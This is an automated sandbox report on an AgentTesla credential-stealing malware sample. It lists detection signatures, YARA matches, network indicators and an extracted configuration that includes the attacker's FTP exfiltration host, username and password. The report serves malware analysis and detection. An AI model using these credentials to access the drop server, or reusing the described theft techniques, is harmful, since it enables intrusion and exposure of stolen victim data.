Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QNx8Bu7CNn.exe

Overview

General Information

Sample Name:QNx8Bu7CNn.exe
Analysis ID:715065
MD5:9a9cb1f7f37aa3955cfb4d8991583e31
SHA1:8d63b02db5ce9bb9bb1691ab4a5282d18078191a
SHA256:943089ba13faf44a75c9624e2b68af1f561d5567bb4ba7cf4a2596b129da6a2b
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • QNx8Bu7CNn.exe (PID: 5292 cmdline: C:\Users\user\Desktop\QNx8Bu7CNn.exe MD5: 9A9CB1F7F37AA3955CFB4D8991583E31)
    • QNx8Bu7CNn.exe (PID: 5840 cmdline: C:\Users\user\Desktop\QNx8Bu7CNn.exe MD5: 9A9CB1F7F37AA3955CFB4D8991583E31)
  • cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.valvulasthermovalve.cl/", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
SourceRuleDescriptionAuthorStrings
00000001.00000000.262156014.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.262156014.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000000.262156014.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x30080:$a13: get_DnsResolver
      • 0x2e88e:$a20: get_LastAccessed
      • 0x309fe:$a27: set_InternalServerPort
      • 0x30d1a:$a30: set_GuidMasterKey
      • 0x2e995:$a33: get_Clipboard
      • 0x2e9a3:$a34: get_Keyboard
      • 0x2fcb3:$a35: get_ShiftKeyDown
      • 0x2fcc4:$a36: get_AltKeyDown
      • 0x2e9b0:$a37: get_Password
      • 0x2f463:$a38: get_PasswordHash
      • 0x30480:$a39: get_DefaultCredentials
      00000000.00000002.278449042.000000000477F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.278449042.000000000477F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32b4d:$s10: logins
              • 0x66f6d:$s10: logins
              • 0x325b4:$s11: credential
              • 0x669d4:$s11: credential
              • 0x2eb95:$g1: get_Clipboard
              • 0x62fb5:$g1: get_Clipboard
              • 0x2eba3:$g2: get_Keyboard
              • 0x62fc3:$g2: get_Keyboard
              • 0x2ebb0:$g3: get_Password
              • 0x62fd0:$g3: get_Password
              • 0x2fea3:$g4: get_CtrlKeyDown
              • 0x642c3:$g4: get_CtrlKeyDown
              • 0x2feb3:$g5: get_ShiftKeyDown
              • 0x642d3:$g5: get_ShiftKeyDown
              • 0x2fec4:$g6: get_AltKeyDown
              • 0x642e4:$g6: get_AltKeyDown
              0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x30280:$a13: get_DnsResolver
              • 0x646a0:$a13: get_DnsResolver
              • 0x2ea8e:$a20: get_LastAccessed
              • 0x62eae:$a20: get_LastAccessed
              • 0x30bfe:$a27: set_InternalServerPort
              • 0x6501e:$a27: set_InternalServerPort
              • 0x30f1a:$a30: set_GuidMasterKey
              • 0x6533a:$a30: set_GuidMasterKey
              • 0x2eb95:$a33: get_Clipboard
              • 0x62fb5:$a33: get_Clipboard
              • 0x2eba3:$a34: get_Keyboard
              • 0x62fc3:$a34: get_Keyboard
              • 0x2feb3:$a35: get_ShiftKeyDown
              • 0x642d3:$a35: get_ShiftKeyDown
              • 0x2fec4:$a36: get_AltKeyDown
              • 0x642e4:$a36: get_AltKeyDown
              • 0x2ebb0:$a37: get_Password
              • 0x62fd0:$a37: get_Password
              • 0x2f663:$a38: get_PasswordHash
              • 0x63a83:$a38: get_PasswordHash
              • 0x30680:$a39: get_DefaultCredentials
              0.2.QNx8Bu7CNn.exe.47e9d28.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 19 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: QNx8Bu7CNn.exeReversingLabs: Detection: 26%
                Source: QNx8Bu7CNn.exeVirustotal: Detection: 32%Perma Link
                Source: ftp://ftp.valvulasthermovalve.cl/cva19491URL Reputation: Label: phishing
                Source: http://ftp.valvulasthermovalve.clAvira URL Cloud: Label: phishing
                Source: ftp.valvulasthermovalve.clVirustotal: Detection: 17%Perma Link
                Source: QNx8Bu7CNn.exeJoe Sandbox ML: detected
                Source: 1.0.QNx8Bu7CNn.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 0.2.QNx8Bu7CNn.exe.47e9d28.8.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.valvulasthermovalve.cl/", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
                Source: QNx8Bu7CNn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: QNx8Bu7CNn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Joe Sandbox ViewIP Address: 190.107.177.239 190.107.177.239
                Source: unknownFTP traffic detected: 190.107.177.239:21 -> 192.168.2.7:49703 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 100 allowed.220-Local time is now 09:49. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 100 allowed.220-Local time is now 09:49. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 100 allowed.220-Local time is now 09:49. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 100 allowed.220-Local time is now 09:49. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.valvulasthermovalve.cl/cva19491
                Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: QNx8Bu7CNn.exe, 00000001.00000002.510640859.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.valvulasthermovalve.cl
                Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pzxuZU.com
                Source: QNx8Bu7CNn.exe, 00000001.00000002.510594948.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp, QNx8Bu7CNn.exe, 00000001.00000002.510594948.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uZTc8nGgAr9KT9EFaKnD.net
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownDNS traffic detected: queries for: ftp.valvulasthermovalve.cl